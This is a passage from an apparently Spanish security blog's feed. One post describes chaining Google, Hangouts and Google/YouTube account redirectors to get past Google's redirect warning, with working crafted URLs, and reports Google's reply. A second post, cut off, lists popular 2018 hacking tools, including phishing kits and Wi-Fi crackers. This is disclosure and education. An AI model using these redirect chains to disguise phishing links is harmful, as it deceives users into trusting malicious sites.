&lt;tr&gt;&lt;td style="text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjvCpiavjpFuU1s2Re5jG7L0Qw2UbNhVZ4_mNtsTdcegs3euIr1EC-b7JksbaBmOYYJmlb0ZxowLkSqaCjKhUbIPwuOcEOVqPr_vbmOMJaV0ZA1QZGPDYrv12M65XPmZPexkdyBQ87OuW_q/s1600/ouo.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"&gt;&lt;img border="0" data-original-height="329" data-original-width="619" height="212" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjvCpiavjpFuU1s2Re5jG7L0Qw2UbNhVZ4_mNtsTdcegs3euIr1EC-b7JksbaBmOYYJmlb0ZxowLkSqaCjKhUbIPwuOcEOVqPr_vbmOMJaV0ZA1QZGPDYrv12M65XPmZPexkdyBQ87OuW_q/s400/ouo.png" width="400" /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class="tr-caption" style="text-align: center;"&gt;Imagen 2: ejemplo caso 3&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;div style="text-align: justify;"&gt;
Hoy nos vamos a centrar en el caso 1, específicamente en los redirectores de Google y Youtube, y ver que tan difícil es poder saltar la confirmación de redirección (imágen 1).&lt;/div&gt;
&lt;br /&gt;
&lt;span style="font-size: large;"&gt;&lt;b&gt;Potenciales usos maliciosos de un redirector&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;
Existen diferentes formas de mal utilizar un redirector, algunas son:&lt;/div&gt;
&lt;ol style="text-align: justify;"&gt;
&lt;li&gt;Redirigir a una web con contenido malicioso o phishing, haciendo creer al usuario final que está en el dominio del redirector.&lt;/li&gt;
&lt;li&gt;Ocultar el Referer original de un enlace.&lt;/li&gt;
&lt;li&gt;Incrementar artificialmente las estadísticas de un sitio web.&lt;/li&gt;
&lt;/ol&gt;
&lt;div style="text-align: justify;"&gt;
En el caso 3 uno puede hacer un script que visite un enlace con redirector, y la página web objetivo va empezar a tener un incremento de visitas del sitio web del redirector, aumentando de forma artificial la fuente de tráfico en un sitio web.&lt;/div&gt;
&lt;br /&gt;
&lt;span style="font-size: large;"&gt;&lt;b&gt;Análisis&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;
Google en su redirector principal, cada vez que haces click en un enlace del buscador, crea un redirector con la URL objetivo (en este ejemplo &lt;b&gt;&lt;span style="color: purple;"&gt;https://www.blackploit.com/&lt;/span&gt;&lt;/b&gt;) y crea 2 tokens (&lt;span style="color: red;"&gt;&lt;b&gt;ved&lt;/b&gt;&lt;/span&gt; y &lt;span style="color: red;"&gt;&lt;b&gt;usg&lt;/b&gt;&lt;/span&gt;) que cambian para evitar que cualquiera pueda aumentar de forma artificial los clicks (que son usados entre otras cosas para posicionar los resultados de búsquedas), en el caso de que los parámetros &lt;span style="color: red;"&gt;&lt;b&gt;ved&lt;/b&gt;&lt;/span&gt; y &lt;b&gt;&lt;span style="color: red;"&gt;usg&lt;/span&gt; &lt;/b&gt;no sean válidos, te mandarán a una página con un mensaje de redirección (imagen 1):&lt;/div&gt;
&lt;pre&gt;&lt;code&gt;https://www.google.com/url?sa=t&amp;amp;rct=j&amp;amp;q=&amp;amp;esrc=s&amp;amp;source=web&amp;amp;cd=1&amp;amp;
&lt;b&gt;ved=&lt;span style="color: red;"&gt;2ahUKEwiAkoTo8pbiAhUBA9QKHYSBAPkQFjAAegQIBhAC&lt;/span&gt;&lt;/b&gt;&amp;amp;&lt;b&gt;&amp;nbsp;&lt;/b&gt;
&lt;b&gt;url=&lt;span style="color: purple;"&gt;https%3A%2F%2Fwww.blackploit.com%2F&lt;/span&gt;&lt;/b&gt;&amp;amp;&lt;b&gt;&amp;nbsp;&lt;/b&gt;
&lt;b&gt;usg=&lt;span style="color: red;"&gt;AOvVaw2YsoR0eglfSf7B9Vk2ZRzS&lt;/span&gt;&lt;/b&gt;&lt;/code&gt;&lt;/pre&gt;
&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;
&lt;b&gt;¿Cómo podemos predecir estos tokens?&lt;/b&gt;, No tengo la menor idea, pero no es necesario ya que Google tiene un &lt;i&gt;whitelist&lt;/i&gt; de dominios que no requieren los tokens de verificación.&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;b&gt;¿Cuáles son estos dominios?&lt;/b&gt;, Obviamente google.com y todos sus TLDs (google.es, cl, net, org, etc.) y todos sus subdominios, por tanto la regla es &lt;i&gt;&lt;b&gt;*.google.{com, cl, es, ... ,TLDs}&lt;/b&gt;&lt;/i&gt;.&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
Por ejemplo:&lt;br /&gt;
&lt;pre&gt;&lt;code&gt;https://www.google.com/url?sa=t&amp;amp;rct=j&amp;amp;q=&amp;amp;esrc=s&amp;amp;source=web&amp;amp;cd=15&amp;amp;
url=&lt;span style="color: red;"&gt;https%3A%2F%2Fdrive.google.com&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;
&lt;div style="text-align: justify;"&gt;
En este ejemplo nos redirige a &lt;i&gt;&lt;b&gt;drive.google.com&lt;/b&gt;&lt;/i&gt; sin mensajes de redireccionamiento.&lt;/div&gt;
&lt;br /&gt;
&lt;pre&gt;&lt;code&gt;https://www.google.com/url?sa=t&amp;amp;rct=j&amp;amp;q=&amp;amp;esrc=s&amp;amp;source=web&amp;amp;cd=15&amp;amp;
url=&lt;span style="color: red;"&gt;https%3A%2F%2Ffake.google.com&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;
&lt;div style="text-align: justify;"&gt;
En este ejemplo nos redirige&amp;nbsp; a &lt;i&gt;&lt;b&gt;fake.google.com&lt;/b&gt;&lt;/i&gt; sin mensajes de redireccionamiento, siendo que &lt;i&gt;&lt;b&gt;fake.google.com&lt;/b&gt;&lt;/i&gt; no existe, lo que confirma la regla vista anteriormente.&lt;/div&gt;
&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;
Por lo tanto debemos simplemente encontrar un solo redirector en &lt;i&gt;&lt;b&gt;*.google.com&lt;/b&gt;&lt;/i&gt; que no tenga reglas o mensajes de redireccionamiento y podemos saltar todos los redirectores de Google, es así como encontramos el redirector de Hangouts:&lt;/div&gt;
&lt;pre&gt;&lt;code&gt;https://hangouts.google.com/linkredirect?dest=&lt;span style="color: red;"&gt;https%3A%2F%2Fwww.blackploit.com%2F&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;
&lt;div style="text-align: justify;"&gt;
Este redirector simplemente nos envía a la URL que queramos sin mensajes ni avisos.&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
Por lo tanto ya tenemos todo lo que necesitamos, simplemente necesitamos codificar la URL paso a paso, donde se pueden ayudar de &lt;a href="https://meyerweb.com/eric/tools/dencoder/" target="_blank"&gt;esta web&lt;/a&gt;. &lt;/div&gt;
&lt;br /&gt;
Codificamos la web objetivo:&lt;br /&gt;
&lt;pre&gt;&lt;code&gt;https://www.blackploit.com
 |
 v
https%3A%2F%2Fwww.blackploit.com&lt;/code&gt;&lt;/pre&gt;
&lt;br /&gt;
La agregamos al redirector de Hangouts y la volvemos a codificar:&lt;br /&gt;
&lt;pre&gt;&lt;code&gt;https://hangouts.google.com/linkredirect?dest=https%3A%2F%2Fwww.blackploit.com
 |
 v
https%3A%2F%2Fhangouts.google.com%2Flinkredirect%3Fdest%3Dhttps%253A%252F%252Fwww.blackploit.com&lt;/code&gt;&lt;/pre&gt;
&lt;br /&gt;
Por último la agregamos al redirector de Google:&lt;br /&gt;
&lt;pre&gt;&lt;code&gt;https://www.google.com/url?sa=t&amp;amp;rct=j&amp;amp;q=&amp;amp;esrc=s&amp;amp;source=web&amp;amp;cd=15&amp;amp;url=&lt;span style="color: red;"&gt;&lt;b&gt;https%3A%2F%2Fhangouts.google.com%2Flinkredirect%3Fdest%3Dhttps%3A%2F%2Fwww.blackploit.com&lt;/b&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;
&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;
Listo! tenemos un enlace &lt;a href="https://www.google.com/url?sa=t&amp;amp;rct=j&amp;amp;q=&amp;amp;esrc=s&amp;amp;source=web&amp;amp;cd=15&amp;amp;url=https%3A%2F%2Fhangouts.google.com%2Flinkredirect%3Fdest%3Dhttps%3A%2F%2Fwww.blackploit.com" target="_blank"&gt;&lt;b&gt;https://www.google.com/...&lt;/b&gt;&lt;/a&gt; que redirige a &lt;b&gt;https://www.blackploit.com/&lt;/b&gt; saltándose el filtro de Google.&lt;/div&gt;
&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;
Este mismo método se puede aplicar en otros redirectores, acá les mostraré dos ejemplos, uno en &lt;b&gt;&lt;i&gt;accounts.google.com&lt;/i&gt;&lt;/b&gt; y otro en &lt;i&gt;&lt;b&gt;accounts.youtube.com&lt;/b&gt;&lt;/i&gt;, ambos tienen el mismo comportamiento:&lt;/div&gt;
&lt;pre&gt;&lt;code&gt;https://accounts.youtube.com/accounts/SetSID?ilo=1&amp;amp;ils=a4cc1b7ed445598%20f16cef403bb3b0311&amp;amp;ilc=0
&amp;amp;continue=&lt;span style="color: red;"&gt;&lt;b&gt;https%3A%2F%2Fhangouts.google.com%2Flinkredirect%3Fdest%3Dhttps%3A%2F%2Fwww.blackploit.com&lt;/b&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;
Y:
&lt;br /&gt;
&lt;pre&gt;&lt;code&gt;https://accounts.google.com/signin/v2/identifier?uilel=3&amp;amp;service=youtube&amp;amp;passive=true&amp;amp;hl=es-419
&amp;amp;continue=&lt;span style="color: red;"&gt;&lt;b&gt;https%3A%2F%2Fhangouts.google.com%2Flinkredirect%3Fdest%3Dhttps%3A%2F%2Fwww.blackploit.com&lt;/b&gt;&lt;/span&gt;
&amp;amp;feature=sign_in_button&amp;amp;app=desktop&amp;amp;hl=es-419&amp;amp;next=%2F&amp;amp;flowName=GlifWebSignIn&amp;amp;flowEntry=ServiceLogin&lt;/code&gt;&lt;/pre&gt;
&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;
Estos dos casos son más interesantes ya que cuando el usuario está logeado en una cuenta Google redirige a la web objetivo sin mostrar mensajes, en el caso de que no esté logeado en Google, le pide usuario y contraseña y luego lo redirige a la web objetivo sin problemas ni avisos.&lt;/div&gt;
&lt;br /&gt;
&lt;table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td style="text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhlZ_md5pFUMfbUw-9m0A5ibVFMJe1ubQgcrGhvb1_oF3ZlqC6F9oobAmOY9GwvbepJySWfKt7gY8B17o9PELSjVb2ES07PrfXPS_rQyDnFum_RhrmiTis9NenxvIfuMnT-fzmEvTGuNuCW/s1600/redirect_google_user_pass.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"&gt;&lt;img border="0" data-original-height="754" data-original-width="1600" height="300" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhlZ_md5pFUMfbUw-9m0A5ibVFMJe1ubQgcrGhvb1_oF3ZlqC6F9oobAmOY9GwvbepJySWfKt7gY8B17o9PELSjVb2ES07PrfXPS_rQyDnFum_RhrmiTis9NenxvIfuMnT-fzmEvTGuNuCW/s640/redirect_google_user_pass.png" width="640" /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class="tr-caption" style="text-align: center;"&gt;Imágen 3: redirección cuando no estamos logeado en Google.&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;br /&gt;
&lt;span style="font-size: large;"&gt;&lt;b&gt;Resumen&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;pre&gt;&lt;code&gt;(1)
https://hangouts.google.com/linkredirect?dest=https%3A%2F%2Fwww.blackploit.com

(2)
https://www.google.com/url?sa=t&amp;amp;rct=j&amp;amp;q=&amp;amp;esrc=s&amp;amp;source=web&amp;amp;cd=15
&amp;amp;url=&lt;span style="color: red;"&gt;&lt;b&gt;https%3A%2F%2Fhangouts.google.com%2Flinkredirect%3Fdest%3Dhttps%3A%2F%2Fwww.blackploit.com&lt;/b&gt;&lt;/span&gt;

(3)
https://accounts.youtube.com/accounts/SetSID?ilo=1&amp;amp;ils=a4cc1b7ed445598%20f16cef403bb3b0311&amp;amp;ilc=0
&amp;amp;continue=&lt;span style="color: red;"&gt;&lt;b&gt;https%3A%2F%2Fhangouts.google.com%2Flinkredirect%3Fdest%3Dhttps%3A%2F%2Fwww.blackploit.com&lt;/b&gt;&lt;/span&gt;

(4)
https://accounts.google.com/signin/v2/identifier?uilel=3&amp;amp;service=youtube&amp;amp;passive=true&amp;amp;hl=es-419
&amp;amp;continue=&lt;span style="color: red;"&gt;&lt;b&gt;https%3A%2F%2Fhangouts.google.com%2Flinkredirect%3Fdest%3Dhttps%3A%2F%2Fwww.blackploit.com&lt;/b&gt;&lt;/span&gt;
&amp;amp;feature=sign_in_button&amp;amp;app=desktop&amp;amp;hl=es-419&amp;amp;next=%2F&amp;amp;flowName=GlifWebSignIn&amp;amp;flowEntry=ServiceLogin&lt;/code&gt;&lt;/pre&gt;
&lt;br /&gt;
&lt;span style="font-size: large;"&gt;&lt;b&gt;Reporte&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;
Se envió el reporte a Google y el bot que responde dijo que era un comportamiento completamente previsto y que incluso no era un defecto, si no, una característica.&lt;/div&gt;
&lt;br /&gt;
&lt;table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td style="text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhwaARiuFNyl_5-PkEEi39vhKj1LKJq0AJXmA0TTXaVo9ctMWdALOLkcxkFWRaWiL8xTgZh-WgfBTeWnYYzmgjrh6rPCAQ9FMRWNa7bNIispGewYckOah4I7AoHc5W00V3uT0gNyUGufWjD/s1600/google_report.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"&gt;&lt;img border="0" data-original-height="885" data-original-width="1099" height="257" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhwaARiuFNyl_5-PkEEi39vhKj1LKJq0AJXmA0TTXaVo9ctMWdALOLkcxkFWRaWiL8xTgZh-WgfBTeWnYYzmgjrh6rPCAQ9FMRWNa7bNIispGewYckOah4I7AoHc5W00V3uT0gNyUGufWjD/s320/google_report.png" width="320" /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class="tr-caption" style="text-align: center;"&gt;Reporte a Google&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;div style="text-align: justify;"&gt;
Incluso mandan un enlace para informarnos más: &lt;a href="https://sites.google.com/site/bughunteruniversity/nonvuln/open-redirect"&gt;https://sites.google.com/site/bughunteruniversity/nonvuln/open-redirect&lt;/a&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
En ese enlace dice claramente que en los redirectores&amp;nbsp; se considera vulneravilidad:&lt;/div&gt;
&lt;ul style="text-align: justify;"&gt;
&lt;li&gt;Content Security Policy bypass&lt;/li&gt;
&lt;li&gt;Referrer check bypass&lt;/li&gt;
&lt;li&gt;URL whitelist bypass&lt;/li&gt;
&lt;/ul&gt;
&lt;div style="text-align: justify;"&gt;
Yo no sé si entiendo mal o el bot necesita un arreglo, pero ya se reportó y el bot tiene la última palabra.&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;span style="font-size: large;"&gt;&lt;b&gt;Conclusión&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
Sin duda se pueden encontrar muchos más casos, aquí presento 3 que no me costó mucho trabajo en encontrar.&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
Puede parecer que esta no es una vulnerabilidad, pero se supone que cuando uno accede a un enlace de un dominio importante, este no debería redirigir a un sitio web malicioso.&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
Por otro lado existen redirectores que tienen en su whitelist de sitios de confianza a google.com, por lo cual esos redirectores también son bypasseables.&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
Personalmente ahora tengo más ojo y no me fio 100% de enlaces de Google.&lt;/div&gt;
&lt;br /&gt;
&lt;br /&gt;
[+] Salu2!&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;</description><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" height="72" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhwrwrE-8mhUQaFftA_NOVguBISNSMSxEmrEpL-xZWftrZ5cZRdVcYzXA27jS1Xi24N22lm_oX5EQhIykfcPrrlnxImly9cw2LwVL5kadHsJ1d7c5-2x9yhWHiDPW_WxJusJ1llCVSGNoeE/s72-c/redirect_yes.png" width="72"/><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">2</thr:total></item><item><title>Las 20 herramientas de hacking más populares del 2018</title><link>http://www.blackploit.com/2018/12/las-20-herramientas-de-hacking-mas.html</link><category>Blackploit</category><category>Hack T00LZ</category><category>Herramientas</category><category>KitPloit</category><category>Noticias</category><category>Seguridad</category><author>noreply@blogger.com (Leo Romero)</author><pubDate>Fri, 28 Dec 2018 10:11:00 -0300</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-8845092171963399971.post-7309642809039644093</guid><description>&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhELom_Ru4K432pvBoIi-E1LqjwHSCvXBr_QShCIOeegsm8qY3MI-CeW7bplUpZuooPsN8m-LqZOECiu-gLCUioKQiU6IqgKbPJVWHqdPjcmyQtmUAbptToTDwbEBIT_GeaxAKkemSbzqwd/s1600/tools-2018-title-2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="800" data-original-width="1200" height="426" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhELom_Ru4K432pvBoIi-E1LqjwHSCvXBr_QShCIOeegsm8qY3MI-CeW7bplUpZuooPsN8m-LqZOECiu-gLCUioKQiU6IqgKbPJVWHqdPjcmyQtmUAbptToTDwbEBIT_GeaxAKkemSbzqwd/s640/tools-2018-title-2.png" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;
En un ranking elaborado por &lt;a href="https://www.kitploit.com/" target="_blank"&gt;&lt;b&gt;Kitploit&lt;/b&gt;&lt;/a&gt;, nos muestran las 20 herramientas más populares (con más visitas) durante el 2018. Es una lista que merece ser revisada, donde se encuentran herramientas de diferentes desarrolladores quienes dedican su tiempo y esfuerzo a colaborar con la comunidad.&amp;nbsp;&lt;/div&gt;
&lt;a name='more'&gt;&lt;/a&gt;&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;
Destacan herramientas de &lt;b&gt;Information Gathering&lt;/b&gt;, &lt;b&gt;ingeniería social (&lt;i&gt;phishing&lt;/i&gt;)&lt;/b&gt;, &lt;b&gt;OSINT&lt;/b&gt;, entre otras. De la lista la que más me gusta es ANDRAX (n° 10) que es una completa suite que corre en Android con un arsenal completo de herramientas que se pueden utilizar gracias a Termux, es como la versión de nuestro queridísimo Kali Linux pero para Android.&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
Sin más, los dejo con la lista:&lt;/div&gt;
&lt;br /&gt;
&lt;ol&gt;
&lt;h2&gt;
&lt;li&gt;
&lt;a href="https://www.kitploit.com//2018/07/eagleeye-stalk-your-friends-find-their.html" target="_blank"&gt;EagleEye - Stalk Your Friends. Find Their Instagram, FB And Twitter Profiles Using Image Recognition And Reverse Image Search&lt;/a&gt;&lt;/li&gt;
&lt;/h2&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi-dcX86p7Kc07TrwkCktuGmVk4jSpuHF_t9z5hyNacYaN4d67dWTIpDS12PeUGJ27k9Qn7JEk2VBPh-7bVNE7JPU_ZD62Iwj58l1A-Bh5ATGv7DzbIWLFPePG0FQCNppymBLpqjZzeVTE/s1600/EagleEye_4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="673" data-original-width="943" height="228" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi-dcX86p7Kc07TrwkCktuGmVk4jSpuHF_t9z5hyNacYaN4d67dWTIpDS12PeUGJ27k9Qn7JEk2VBPh-7bVNE7JPU_ZD62Iwj58l1A-Bh5ATGv7DzbIWLFPePG0FQCNppymBLpqjZzeVTE/s320/EagleEye_4.png" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;h2&gt;
&lt;li&gt;
&lt;a href="https://www.kitploit.com//2018/04/hijacker-v15-all-in-one-wi-fi-cracking.html" target="_blank"&gt;Hijacker v1.5 - All-in-One Wi-Fi Cracking Tools for Android&lt;/a&gt;&lt;/li&gt;
&lt;/h2&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgDfxybBnmF3Ol0_KB1KvBcGQ_chVCeryN2WghtfxkmLg-9MUtwSLBSSni8HmVH-o6wvtJRgLBgBCi2bJn8w6j6_jwz2OqU8DR0VtTYzsmvJkZpJ8pkZNp1oHYpmIEuuluHKEt9p-QJKEk/s640/01_airodump_view.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="640" data-original-width="360" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgDfxybBnmF3Ol0_KB1KvBcGQ_chVCeryN2WghtfxkmLg-9MUtwSLBSSni8HmVH-o6wvtJRgLBgBCi2bJn8w6j6_jwz2OqU8DR0VtTYzsmvJkZpJ8pkZNp1oHYpmIEuuluHKEt9p-QJKEk/s320/01_airodump_view.png" width="180" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;h2&gt;
&lt;li&gt;
&lt;a href="https://www.kitploit.com//2014/12/loic-108-low-orbit-ion-cannon-network.html" target="_blank"&gt;LOIC 1.0.8 (Low Orbit Ion Cannon) - A network stress testing application&lt;/a&gt;&lt;/li&gt;
&lt;/h2&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj7MccKP1Z0C_13zMyUyNnhvMRZKQ2sux0rwnKHaEuQ310wfA2rJTjgm0tqYlBRlniBVq7rviEBlxQ1SGrkaFV6ivuCOIFT6WxwR5Uyx9veGAOs8ytt_lZhDkDSyDAxwS5qtaYE-6PWNLY/s1600/LOIC.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="524" data-original-width="998" height="168" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj7MccKP1Z0C_13zMyUyNnhvMRZKQ2sux0rwnKHaEuQ310wfA2rJTjgm0tqYlBRlniBVq7rviEBlxQ1SGrkaFV6ivuCOIFT6WxwR5Uyx9veGAOs8ytt_lZhDkDSyDAxwS5qtaYE-6PWNLY/s320/LOIC.jpg" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;h2&gt;
&lt;li&gt;
&lt;a href="https://www.kitploit.com/2017/11/trape-people-tracker-on-internet-learn.html" target="_blank"&gt;Trape - People tracker on the Internet (The evolution of phishing attacks) OSINT&lt;/a&gt;&lt;/li&gt;
&lt;/h2&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhMJuPXp9VlX0_q_OcISMjOPVkRqbEDwibCEt3ZgiZ2YcOXk9GBPBgbkvAsu-RWYbJ3Z3uJK9ZcZGLjSNA-KNu62olVFyQKFDwzyygPvkK2v0DpzzxVp2IMG9Z60gUnJaA6YRW0t2-guzw/s640/trape_1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="307" data-original-width="640" height="153" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhMJuPXp9VlX0_q_OcISMjOPVkRqbEDwibCEt3ZgiZ2YcOXk9GBPBgbkvAsu-RWYbJ3Z3uJK9ZcZGLjSNA-KNu62olVFyQKFDwzyygPvkK2v0DpzzxVp2IMG9Z60gUnJaA6YRW0t2-guzw/s320/trape_1.png" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;h2&gt;
&lt;li&gt;
&lt;a href="https://www.kitploit.com//2018/08/blackeye-most-complete-phishing-tool.html" target="_blank"&gt;BlackEye - The Most Complete Phishing Tool, With 32 Templates +1 Customizable&lt;/a&gt;&lt;/li&gt;
&lt;/h2&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhHdVxEaklKUhnQp6zUaXJomhN2o33ROB-LdM85cvkXHjC0B0C3OvLY9AxzAMVchvkTsFWZTNbntSkbWXyxE5R796xQQnb5JcKLYhPnS3XJYlyuQEbK4sz5-iQEl7RRjMqFNovnsL7ouH5L/s640/blackeye_1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="497" data-original-width="640" height="248" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhHdVxEaklKUhnQp6zUaXJomhN2o33ROB-LdM85cvkXHjC0B0C3OvLY9AxzAMVchvkTsFWZTNbntSkbWXyxE5R796xQQnb5JcKLYhPnS3XJYlyuQEbK4sz5-iQEl7RRjMqFNovnsL7ouH5L/s320/blackeye_1.png" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;h2&gt;
&lt;li&gt;
&lt;a href="https://www.kitploit.com//2018/04/mercury-hacking-tool-used-to-collect.html" target="_blank"&gt;Mercury - A Hacking Tool Used To Collect Information And Use The Information To Further Hurt The Target&lt;/a&gt;&lt;/li&gt;
&lt;/h2&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgN1PBmUcbRJFBRYcIrxMmOR6DNBNbig8SzfUUs7ABdf3VAOhJI_ERHvMGk4mkLVUhbbN2srJYxZxHlqhPao2knccyYtiWMcEkFoGHZPDeJYaOBeEfPvLsoGi3DnmlyQpefx1tVftAXslA/s640/Mercury.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="383" data-original-width="640" height="191" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgN1PBmUcbRJFBRYcIrxMmOR6DNBNbig8SzfUUs7ABdf3VAOhJI_ERHvMGk4mkLVUhbbN2srJYxZxHlqhPao2knccyYtiWMcEkFoGHZPDeJYaOBeEfPvLsoGi3DnmlyQpefx1tVftAXslA/s320/Mercury.png" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;h2&gt;
&lt;li&gt;
&lt;a href="https://www.kitploit.com//2018/06/vooki-web-application-vulnerability.html" target="_blank"&gt;VOOKI - Web Application Vulnerability Scanner&lt;/a&gt;&lt;/li&gt;
&lt;/h2&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
